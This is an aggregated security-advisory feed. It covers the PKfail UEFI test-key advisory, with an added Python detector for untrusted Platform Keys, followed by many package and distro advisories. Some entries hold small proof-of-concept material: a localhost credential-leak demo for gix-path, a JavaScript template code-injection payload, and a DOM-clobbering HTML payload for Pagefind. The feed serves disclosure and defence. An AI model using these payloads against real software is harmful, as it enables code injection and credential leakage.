These softkeys, intended solely for compatibility testing and performance evaluation, are supposed to be untrusted and restricted in their usage. The current UEFI key verification process is limited: it only checks against the keys in the local database, with no verification against the root Certificate Authority (CA) or special validation of extended attributes. Although keys cannot be self-signed, the lack of stringent verification allows these untrusted keys to be mistakenly included in production firmware.

Recent audits have uncovered that many OEM devices shipped with hard-coded, untrusted keys in their production UEFI firmware. Despite these keys often having attributes like "DO NOT TRUST," there is no programmatic safeguard or other validation (say, attribute-based) to prevent their inclusion in final products. The compromise or leak of these private keys could have severe consequences, allowing attackers to sign malicious modules that execute with high privileges during the boot process, even if Secure Boot is enabled. This undermines the very purpose of signed software verification, leaving systems vulnerable to untrusted and malicious modules.

Compounding the issue, UEFI firmware is largely invisible to most Endpoint Detection and Response (EDR) software, making it difficult to audit and detect the use of compromised keys. Moreover, many UEFI implementations lack remote measurement or auditing capabilities that could dynamically check the integrity of the key database via network resources.

### Impact

An attacker with access to an undesired-yet-trusted test Platform Key's private portion can exploit it to sign malicious UEFI software, enabling the execution of code with the highest privileges during the early boot phases of a UEFI Secure Boot-protected system. A successful attack could lead to the following impacts:

* Invalidation or bypass of UEFI security features like Secure Boot.
* Installation of persistent software that cannot be easily detected or erased, which can also persist across reboots and potentially survive OS reinstalls.
* Creation of backdoors and back communication channels to exfiltrate sensitive data.
* Interruption of system execution leading to device damage or permanent shutdown.

### Solution

* **Update UEFI Firmware**: Ensure you install the latest stable version of UEFI firmware provided by your PC vendor or the reseller of your computing environment. Refer to the Vendor Information section below for specific resources and updates from vendors addressing these vulnerabilities.
* **Use Researcher Tools for Impact Assessment**: Utilize [tools and information](https://github.com/binarly-io/Vulnerability-REsearch/blob/main/PKfail/BRLY-2024-005.md) provided by Binarly to assess the impact of untrusted Platform Keys on your systems. These resources can help you conduct a thorough analysis of affected systems.
* **Leverage Automatic Firmware Updates**: If your operating system supports automatic or managed firmware updates (e.g., Linux Vendor Firmware Service, LVFS), regularly check for updates using `fwupdmgr get-updates` and apply them with `fwupdmgr update`, or use [Windows OEM supported mechanisms](https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/windows-uefi-firmware-update-platform) as appropriate. Keeping your firmware up to date is crucial in mitigating the risks associated with PKfail.

### Acknowledgements

Thanks to [Binarly](https://www.binarly.io/blog/pkfail-untrusted-platform-keys-undermine-secure-boot-on-uefi-ecosystem) for disclosing this vulnerability. This document was written by Vijay Sarvepalli.
https://secdb.nttzen.cloud/security-advisory/cert/VU:455367
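The first question on any fleet is simply which PK each machine has enrolled. The following added example (written for this page; not Binarly's or CERT's tooling) reads the `PK` variable from the Linux efivars filesystem, walks its `EFI_SIGNATURE_LIST` structure as laid out in the UEFI specification, and flags an X.509 entry whose DER contains the "DO NOT TRUST" marker the advisory quotes. The efivars path and the extra "DO NOT SHIP" marker are assumptions, the substring match is a heuristic rather than X.509 parsing, and the sample variable in the test is constructed.

```python
# Added example, not Binarly's or CERT's tooling: enumerate the enrolled
# Platform Key and flag certificates carrying test-key marker strings.
import struct
import uuid

EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
# Global variable GUID 8be4df61-93ca-11d2-aa0d-00e098032b8c is where PK lives.
PK_EFIVAR = "/sys/firmware/efi/efivars/PK-8be4df61-93ca-11d2-aa0d-00e098032b8c"
# "DO NOT TRUST" is quoted by the advisory; "DO NOT SHIP" is an assumed companion.
SUSPICIOUS_MARKERS = (b"DO NOT TRUST", b"DO NOT SHIP")
# Constructed owner GUID used only by the demo and tests.
OWNER_GUID_EXAMPLE = uuid.UUID("11111111-2222-3333-4444-555555555555")


def parse_signature_lists(data: bytes):
    """Yield (signature_type, owner_guid, signature_data) for every
    EFI_SIGNATURE_DATA in a buffer of EFI_SIGNATURE_LIST records.
    Header layout: SignatureType[16] SignatureListSize[4]
    SignatureHeaderSize[4] SignatureSize[4], then the optional header,
    then SignatureSize-byte entries each starting with a 16-byte owner."""
    off = 0
    while off < len(data):
        if off + 28 > len(data):
            raise ValueError("truncated EFI_SIGNATURE_LIST header")
        sig_type = uuid.UUID(bytes_le=data[off:off + 16])
        list_size, hdr_size, sig_size = struct.unpack_from("<III", data, off + 16)
        if list_size < 28 + hdr_size or off + list_size > len(data) or sig_size < 16:
            raise ValueError("inconsistent EFI_SIGNATURE_LIST sizes")
        pos = off + 28 + hdr_size
        end = off + list_size
        while pos + sig_size <= end:
            owner = uuid.UUID(bytes_le=data[pos:pos + 16])
            yield sig_type, owner, data[pos + 16:pos + sig_size]
            pos += sig_size
        off += list_size


def build_signature_list(sig_type: uuid.UUID, owner: uuid.UUID, sig_data: bytes) -> bytes:
    """Inverse of parse_signature_lists for one entry; used to construct
    test input, not needed on a real machine."""
    sig_size = 16 + len(sig_data)
    header = sig_type.bytes_le + struct.pack("<III", 28 + sig_size, 0, sig_size)
    return header + owner.bytes_le + sig_data


def assess_pk(var_data: bytes) -> dict:
    """Classify a PK variable body. `certs` == 0 means no PK is enrolled
    (Setup Mode); `untrusted` lists X.509 entries carrying a marker."""
    findings = {"certs": 0, "untrusted": []}
    for sig_type, owner, blob in parse_signature_lists(var_data):
        if sig_type != EFI_CERT_X509_GUID:
            continue
        findings["certs"] += 1
        hits = [m.decode() for m in SUSPICIOUS_MARKERS if m in blob]
        if hits:
            findings["untrusted"].append({"owner": str(owner), "markers": hits})
    return findings


def read_pk_efivar(path: str = PK_EFIVAR) -> bytes:
    """efivars files carry a 4-byte attribute word before the variable data."""
    with open(path, "rb") as f:
        return f.read()[4:]


if __name__ == "__main__":
    try:
        print(assess_pk(read_pk_efivar()))
    except OSError as e:
        print("cannot read PK from efivars:", e)
```

The substring match works because DER encodes the subject and issuer common names as plain ASCII strings, but a proper check should decode the certificate (for example `openssl x509 -inform DER -noout -subject -issuer` on the extracted blob) and compare subject, issuer and serial against your OEM's published production key. A clean result here only says the PK is not one of the known test keys; it says nothing about whether the firmware has actually been updated to the vendor's fixed build.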
30.08.2024 05:07:09fedora[FEDORA-2024-5361efb19a] Fedora 40: python3.13Security fix for CVE-2024-8088https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5361efb19a
30.08.2024 03:00:00debian[DSA-5762-1] webkit2gtk (critical)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5762-1
30.08.2024 03:00:00debian[DSA-5763-1] pymatgen (critical)security updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5763-1
30.08.2024 03:00:00oraclelinux[ELSA-2024-6000] postgresql:12 security update (important)pgaudit; pg_repack; postgres-decoderbufs; postgresql [12.20-1]: Update to 12.20; Fix CVE-2024-7348https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6000
30.08.2024 03:00:00oraclelinux[ELSA-2024-6001] postgresql:15 security update (important)pgaudit; pg_repack; postgres-decoderbufs; postgresql [15.8-1]: Update to 15.8; Fix CVE-2024-7348https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6001
30.08.2024 03:00:00oraclelinux[ELSA-2024-6018] postgresql:13 security update (important)pgaudit; pg_repack; postgres-decoderbufs; postgresql [13.16-1]: Update to 13.16; Fix CVE-2024-7348https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6018
30.08.2024 03:00:00oraclelinux[ELSA-2024-6020] postgresql:15 security update (important)
pgaudit
[1.7.0-1]
- Initial import for postgresql 15 module
- Update to 1.7.0
- Support postgresql 15
- Related: #2128410
pg_repack
postgres-decoderbufs
[1.9.7-1.Final]
- Initial import for postgresql 15 stream
- Related: #2128410
postgresql
[15.8-1]
- Update to 15.8
[15.6-3]
- Remove /var/run/postgresql
- Related: RHEL-51271
[15.6-2]
- Enable lz4 and zstd support
[15.6-1]
- Update to 15.6 and 13.14
- Fix CVE-2024-0985
[15.5-1]
- Update to 15.5
- Fixes CVE-2023-5868, CVE-2023-5869, CVE-2023-5870, CVE-2023-39417, and CVE-2023-39418
[15.3-1]
- Update to 15.3
- Fixes CVE-2023-2454 and CVE-2023-2455; Resolves: #2214875
[15.2-1]
- Update to 15.2
- Resolves: #2128410
[15.0-2]
- Update postgresql-setup to 8.8
[15.0-1]
- Initial import for postgresql 15
- Resolves: #2128410
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6020
30.08.2024 15:36:27almalinux[ALSA-2024:5927] postgresql:16 security update (important)postgresql:16 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:5927
31.08.2024 21:34:53slackware[SSA:2024-244-01] libpcapNew libpcap packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/libpcap-1.10.5-i586-1_slack15.0.txz: Upgraded.
  This update fixes security issues:
  Clean up sock_initaddress() and its callers to avoid double frees in some cases.
  Fix pcap_findalldevs_ex() not to crash if passed a file:// URL with a path to a directory that cannot be opened.
  For more information, see:
  https://www.cve.org/CVERecord?id=CVE-2023-7256
  https://www.cve.org/CVERecord?id=CVE-2024-8006
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libpcap-1.10.5-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libpcap-1.10.5-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpcap-1.10.5-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpcap-1.10.5-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
293031b602d63cc1d28a4bf833d15a29  libpcap-1.10.5-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
bc1f59d938e9b707c84ec26bbe33940a  libpcap-1.10.5-x86_64-1_slack15.0.txz

Slackware -current package:
a52f1a8064892102cb7b5038c00ff35b  l/libpcap-1.10.5-i686-1.txz

Slackware x86_64 -current package:
d789bc6867690cb1ab76212e68a0c159  l/libpcap-1.10.5-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg libpcap-1.10.5-i586-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-244-01
01.09.2024 19:42:16rustsec[RUSTSEC-2024-0367] gix-path uses local config across repos when it is the highest scope
### Summary

`gix-path` executes `git` to find the path of a configuration file that belongs to the `git` installation itself, but mistakenly treats the local repository's configuration as system-wide if no higher scoped configuration is found. In rare cases, this causes a less trusted repository to be treated as more trusted, or leaks sensitive information from one repository to another, such as sending credentials to another repository's remote.

### Details

In `gix_path::env`, the underlying implementation of the `installation_config` and `installation_config_prefix` functions calls `git config -l --show-origin` and parses the first line of the output to extract the path to the configuration file holding the configuration variable of highest [scope](https://git-scm.com/docs/git-config#SCOPES):

https://github.com/Byron/gitoxide/blob/12251eb052df30105538fa831e641eea557f13d8/gix-path/src/env/git/mod.rs#L91
https://github.com/Byron/gitoxide/blob/12251eb052df30105538fa831e641eea557f13d8/gix-path/src/env/git/mod.rs#L112

While the configuration variable of highest scope is not usually in the local scope, there are practical situations where this occurs:

- A configuration file truly associated with the installation is not present on all systems and can occasionally be empty. Likewise, there may be no variables in the global scope.
- Configuration files associated with those higher scopes may be deliberately skipped by setting the `GIT_CONFIG_SYSTEM` and `GIT_CONFIG_GLOBAL` environment variables to `/dev/null` (or to `NUL` on Windows). This prevents `gix-path` from finding the path of configuration files for those scopes, while not preventing downstream components such as the function in `gix-config` from reporting a local path as being associated with the installation.
- The `GIT_CONFIG_NOSYSTEM` environment variable can be used to disable configuration associated with the installation. (`GIT_CONFIG_NOSYSTEM=1` is more powerful than `GIT_CONFIG_SYSTEM=/dev/null` on systems where an additional "unknown" scope is associated with the installation, as occurs on macOS with Apple Git.) This will cause the local scope to be the highest nonempty scope under even more situations, though in practice it is less dangerous because most, though possibly not all, downstream components would disregard the value.

A user may use either or both of the latter two techniques to turn off an undesired configuration or to create a more replicable environment. Such a user would expect that this results in a more controlled configuration.

Often, when located inside one repository, a user performs operations on that repository or operations that are not specific to any repository. In such use, local configuration is typically desired or at least acceptable, and mistaking it as coming from another scope is not typically harmful.

However, sometimes a user is in one repository and operates on another repository. A major case where this occurs is cloning one repository while located in another. This can be done in an ad-hoc fashion, including when cloning the repository outside of the one we are inside. It may also potentially be automated by an application for purposes such as submodule handling.

Two kinds of problems are anticipated:

- A less secure configuration may be set for a specific repository where it is judged acceptable, even though it would not be wanted for other repositories, such as to enable a protocol or set up debugging.
- More likely, a configuration that supplies secrets for use in one repository's remote can be used to send those secrets to another repository's remote.

### PoC

In this example, we send mock `Authorization: Basic ...` credentials meant for one repository's remote to another remote, by running `gix` while inside the first repository to clone the second repository.

These instructions are written for a Unix shell, but they will work in other shells, including in PowerShell on Windows if the method of setting environment variables is adapted and `/dev/null` is replaced with `NUL`. This procedure is likely to demonstrate the problem on all systems *except* macOS. This is due to the high-scoped "unknown" configuration that usually accompanies Apple Git, and reflects that gix-path is in practice much less vulnerable on macOS (though still potentially vulnerable).

1. Install [`dummyhttp`](https://crates.io/crates/dummyhttp) to serve as a local HTTP server for the demonstration.
2. Obtain a build of `gitoxide` with the `max` feature set enabled. While this vulnerability affects other builds, this example requires `max` for `http.extraHeader` support. Running `cargo install gitoxide` will install such a build, though it may build against a patched version of `gix-path`. Cloning the repository ([`12251eb`](https://github.com/Byron/gitoxide/commit/12251eb052df30105538fa831e641eea557f13d8) and earlier are affected) and building with `cargo build` or `cargo install --path .` are also sufficient. In contrast, installing from published binaries with `binstall` or `quickinstall` does not provide the `max` feature, as of this writing.
3. Run: `dummyhttp -i 127.0.0.1 -c 403 -v`
4. In a separate terminal, create a new local repository and set up a mock remote and `http.extraHeader` configuration:

   ```sh
   git init myrepo
   cd myrepo
   git remote add origin http://127.0.0.1:8080/mygit.git
   git config --local http.extraHeader 'Authorization: Basic abcde'
   ```

5. Make sure the testing setup is working by running `gix fetch` in the repository and checking that it fails in the expected way. In the terminal where that is run, a message should be shown indicating an HTTP 403 error. The more interesting output is in the terminal where `dummyhttp` is running, which should look like this:

   ```text
   2024-30-30 03:30:16 127.0.0.1:55689 GET /myrepo.git/info/refs?service=git-upload-pack HTTP/1.1
   ┌─Incoming request
   │ GET /myrepo.git/info/refs?service=git-upload-pack HTTP/1.1
   │ Accept: */*
   │ Authorization: Basic abcde
   │ Git-Protocol: version=2
   │ Host: 127.0.0.1:8080
   │ User-Agent: git/oxide-0.42.2
   ┌─Outgoing response
   │ HTTP/1.1 403 Forbidden
   │ Content-Length: 9
   │ Content-Type: text/plain; charset=utf-8
   │ Date: Fri, 30 Aug 2024 03:30:16 -0400
   ```

   Some details may differ, especially dates and times. But `Authorization: Basic abcde` should be shown.

6. Now, in the terminal where you ran `gix fetch`, try cloning a separate repository:

   ```sh
   gix clone http://127.0.0.1:8080/other.git
   ```

   Check the output appended in the terminal where `dummyhttp` is running. This is to observe that `Authorization: Basic abcde` was rightly *not* sent. Alternatively, if it *does* appear, then your system may be in one of the uncommon configurations that is vulnerable without further action.

7. Now rerun that command, but with a modified environment, to cause `gix-path` to wrongly treat configuration from the local scope as being associated with the `git` installation:

   ```sh
   env GIT_CONFIG_SYSTEM=/dev/null GIT_CONFIG_GLOBAL=/dev/null gix clone http://127.0.0.1:8080/other.git
   ```

   Check the output appended in the terminal where `dummyhttp` is running. Observe that `Authorization: Basic abcde` was wrongly sent.

While this procedure uses the same remote host for both repositories, this is not a required element. If the second repository had a different, untrusted host, the extra header would still be sent.

### Impact

It is believed to be very difficult to exploit this vulnerability deliberately, due to the need either to anticipate a situation in which higher-scoped configuration variables would be absent, or to arrange for this to happen. Although any operating system may be affected, users running Apple Git on macOS are much less likely to be affected.

In the example shown above, more secure general practices would avoid it: using a credential manager, or even using `http.<url>.extraHeader` with as specific a `<url>` as possible, rather than the more general `http.extraHeader`. Many scenarios are analogous: if each repository's configuration is as secure as possible for how the repository is used, and secrets are stored securely and separately, then the circumstances under which an unacceptably insecure configuration is used, or under which a leak of credentials would occur, become unlikely.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0367
04.09.2024 00:57:41 | maven | [MAVEN:GHSA-8WM9-24QG-M5QJ] Keycloak has a brute force login protection bypass (moderate)
A vulnerability was found in Keycloak. This flaw allows attackers to bypass brute force protection by exploiting the timing of login attempts. By initiating multiple login requests simultaneously, attackers can exceed the configured limits for failed attempts before the system locks them out. This timing loophole enables attackers to make more guesses at passwords than intended, potentially compromising account security on affected systems.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8WM9-24QG-M5QJ

04.09.2024 00:15:50 | slackware | [SSA:2024-247-02] seamonkey
New seamonkey packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/seamonkey-2.53.19-i686-1_slack15.0.txz: Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
    https://www.seamonkey-project.org/releases/seamonkey2.53.19
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/seamonkey-2.53.19-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/seamonkey-2.53.19-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.53.19-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.53.19-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
75c0ed299f27b64251ed725ef23da40c  seamonkey-2.53.19-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
fc8c3a1d94ea6d5050eea997ee495f02  seamonkey-2.53.19-x86_64-1_slack15.0.txz

Slackware -current package:
46a63968b7230033aa7a9be6b26374ec  xap/seamonkey-2.53.19-i686-1.txz

Slackware x86_64 -current package:
18d1e3b43dbdc8b3d606b54535173197  xap/seamonkey-2.53.19-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg seamonkey-2.53.19-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-247-02

04.09.2024 00:15:31 | slackware | [SSA:2024-247-01] mozilla-firefox
New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-firefox-115.15.0esr-i686-1_slack15.0.txz: Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/firefox/115.15.0/releasenotes/
    https://www.mozilla.org/security/advisories/mfsa2024-41/
    https://www.cve.org/CVERecord?id=CVE-2024-8381
    https://www.cve.org/CVERecord?id=CVE-2024-8382
    https://www.cve.org/CVERecord?id=CVE-2024-8383
    https://www.cve.org/CVERecord?id=CVE-2024-8384
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.15.0esr-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.15.0esr-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-128.2.0esr-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-128.2.0esr-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
3d1a29eed6f7c60e5bb550fdd10ca16b  mozilla-firefox-115.15.0esr-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
b04f5c98c20a175659230ebdda2a05ff  mozilla-firefox-115.15.0esr-x86_64-1_slack15.0.txz

Slackware -current package:
869213a24c8ceafa0721a2682f1fc545  xap/mozilla-firefox-128.2.0esr-i686-1.txz

Slackware x86_64 -current package:
c6fc4edb88056dfe587612a8fa0469f3  xap/mozilla-firefox-128.2.0esr-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-firefox-115.15.0esr-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-247-01

03.09.2024 23:08:31 | npm | [NPM:GHSA-6Q32-HQ47-5QQ3] @actions/artifact has an Arbitrary File Write via artifact extraction (high)
### Impact

Versions of `actions/artifact` before 2.1.7 are vulnerable to arbitrary file write when using `downloadArtifactInternal`, `downloadArtifactPublic`, or `streamExtractExternal` for extracting a specifically crafted artifact that contains path traversal filenames.

### Patches

Upgrade to version 2.1.7 or higher.

### References

- https://snyk.io/research/zip-slip-vulnerability
- https://github.com/actions/toolkit/pull/1724

### CVE

CVE-2024-42471

### Credits

Justin Taft from Google

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6Q32-HQ47-5QQ3

04.09.2024 00:45:33 | npm | [NPM:GHSA-Q765-WM9J-66QJ] @blakeembrey/template vulnerable to code injection when attacker controls template input (high)
### Impact

It is possible to inject and run code within the template if the attacker has access to write the template name.

```js
const { template } = require('@blakeembrey/template');

template("Hello {{name}}!", "exploit() {} && ((()=>{ console.log('success'); })()) && function pwned");
```

### Patches

Upgrade to 1.2.0.

### Workarounds

Don't pass untrusted input as the template display name, or don't use the display name feature.

### References

Fixed by removing in https://github.com/blakeembrey/js-template/commit/b8d9aa999e464816c6cfb14acd1ad0f5d1e335aa.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-Q765-WM9J-66QJ

04.09.2024 03:40:40 | npm | [NPM:GHSA-4QRM-9H4R-V2FX] Tina search token leak via lock file in TinaCMS (high)
### Impact

Tina search token leaked via lock file (tina-lock.json) in TinaCMS. Sites building with @tinacms/cli < 1.6.2 that use a search token are impacted.

If your Tina-enabled website has search set up, you should rotate that key immediately.

### Patches

This issue has been patched in @tinacms/cli@1.6.2

### Workarounds

Upgrading, and rotating the search token, is required for the proper fix.

### References

https://github.com/tinacms/tinacms/pull/4758

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4QRM-9H4R-V2FX

04.09.2024 00:45:33 | npm | [NPM:GHSA-GPRJ-6M2F-J9HX] DOM clobbering could escalate to Cross-site Scripting (XSS) (moderate)
Pagefind initializes its dynamic JavaScript and WebAssembly files relative to the location of the first script you load. This information is gathered by looking up the value of `document.currentScript.src`.

It is possible to "clobber" this lookup with otherwise benign HTML on the page, for example:

```html
<img name="currentScript" src="blob:https://xxx.xxx.xxx/ui.js"></img>
```

This will cause `document.currentScript.src` to resolve as an external domain, which will then be used by Pagefind to load dependencies.

This exploit would only work in the case that an attacker could inject HTML to your live, hosted, website. In these cases, this would act as a way to escalate the privilege available to an attacker. This assumes they have the ability to add some elements to the page (for example, `img` tags with a `name` attribute), but not others, as adding a `script` to the page would itself be the XSS vector.

Pagefind has tightened this resolution by ensuring the source is loaded from a valid script element. There are no reports of this being exploited in the wild via Pagefind.

### Original Report

If an attacker can inject benign html, such as:

`<img name="currentScript" src="blob:https://xxx.xxx.xxx/ui.js"></img>`

they can clobber `document.currentScript.src` leading to XSS in your library.

Here is the same attack on webpack that was accepted: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GPRJ-6M2F-J9HX

03.09.2024 19:36:41 | ubuntu | [USN-6987-1] Django vulnerabilities
Several security issues were fixed in Django.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6987-1

03.09.2024 19:15:07 | alpinelinux | [ALPINE:CVE-2024-6119] openssl vulnerability (high)
[From CVE-2024-6119] Issue summary: Applications performing certificate name checks (e.g., TLS clients checking server certificates) may attempt to read an invalid memory address resulting in abnormal termination of the application process.

Impact summary: Abnormal termination of an application can cause a denial of service.

Applications performing certificate name checks (e.g., TLS clients checking server certificates) may attempt to read an invalid memory address when comparing the expected name with an `otherName` subject alternative name of an X.509 certificate. This may result in an exception that terminates the application program.

Note that basic certificate chain validation (signatures, dates, ...) is not affected; the denial of service can occur only when the application also specifies an expected DNS name, Email address or IP address.

TLS servers rarely solicit client certificates, and even when they do, they generally don't perform a name check against a reference identifier (expected identity), but rather extract the presented identity after checking the certificate chain. So TLS servers are generally not affected and the severity of the issue is Moderate.

The FIPS modules in 3.3, 3.2, 3.1 and 3.0 are not affected by this issue.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-6119

03.09.2024 18:12:58 | ubuntu | [USN-6981-2] Drupal vulnerabilities
Drupal could be made to crash or run programs if it received specially crafted network traffic.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6981-2

03.09.2024 17:33:38 | ubuntu | [USN-6986-1] OpenSSL vulnerability
OpenSSL could be made to crash or expose sensitive information if it received a specially crafted certificate.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6986-1

03.09.2024 08:51:37 | fedora | [FEDORA-2024-7b8a05a5d1] Fedora 40: flatpak (critical)
Update to 1.15.10 (CVE-2024-42472)
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7b8a05a5d1

03.09.2024 08:51:32 | fedora | [FEDORA-2024-afba3b5902] Fedora 40: python3.12
Security fix for CVE-2024-8088
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-afba3b5902

03.09.2024 16:11:49 | almalinux | [ALSA-2024:6148] nodejs:18 security update (moderate)
nodejs:18 security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6148

03.09.2024 16:27:19 | almalinux | [ALSA-2024:6162] python-urllib3 security update (moderate)
python-urllib3 security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6162

03.09.2024 16:09:23 | almalinux | [ALSA-2024:6147] nodejs:18 security update (moderate)
nodejs:18 security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6147

03.09.2024 16:25:37 | almalinux | [ALSA-2024:6187] gvisor-tap-vsock security update (moderate)
gvisor-tap-vsock security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6187

03.09.2024 16:22:47 | almalinux | [ALSA-2024:6195] skopeo security update (moderate)
skopeo security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6195

03.09.2024 10:39:18 | almalinux | [ALSA-2024:6146] python3.12 security update (moderate)
python3.12 security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6146

03.09.2024 16:24:13 | almalinux | [ALSA-2024:6189] buildah security update (moderate)
buildah security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6189

03.09.2024 03:00:00 | cisa | [CISA-2024:0903] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (high)
CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0903

03.09.2024 03:00:00 | debian | [DSA-5764-1] openssl (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5764-1

03.09.2024 03:00:00 | freebsd | [FREEBSD:21F505F4-6A1C-11EF-B611-84A93843EB75] OpenSSL -- Multiple vulnerabilities (critical)
The OpenSSL project reports:

Possible denial of service in X.509 name checks [Moderate severity]
Applications performing certificate name checks (e.g., TLS clients checking server certificates) may attempt to read an invalid memory address resulting in abnormal termination of the application process.

SSL_select_next_proto buffer overread [Low severity]
Calling the OpenSSL API function SSL_select_next_proto with an empty supported client protocols buffer may cause a crash or memory contents to be sent to the peer.
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:21F505F4-6A1C-11EF-B611-84A93843EB75

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-5999] postgresql security update (important)
[13.16-1.0.1]
- Remove non ASCII character from changelog date
[13.16-1]
- Update to 13.16
[13.14-2]
- Remove /var/run/postgresql
- Related: RHEL-25756
[13.14-1]
- Update to 13.14
- Fix CVE-2024-0985
[13.13-1]
- Update to 13.13
- Fixes CVE-2023-5868, CVE-2023-5869, CVE-2023-5870, and CVE-2023-39417
- Resolves: RHEL-5567
[13.11-1]
- Update to 13.11
- Resolves: #2207935
* Tue Feb 28 2023 Filip Janus <fjanus@redhat.com> - 13.10-1
- Update to 13.10
- Resolves: #2114734
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-5999

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6146] python3.12 security update (moderate)
[3.12.1-4.3]
- Security fix for CVE-2024-8088
Resolves: RHEL-55964
[3.12.1-4.2]
- Security fix for CVE-2024-6923
Resolves: RHEL-53087
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6146

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6162] python-urllib3 security update (moderate)
[1.26.5-5.1]
- Security fix for CVE-2024-37891
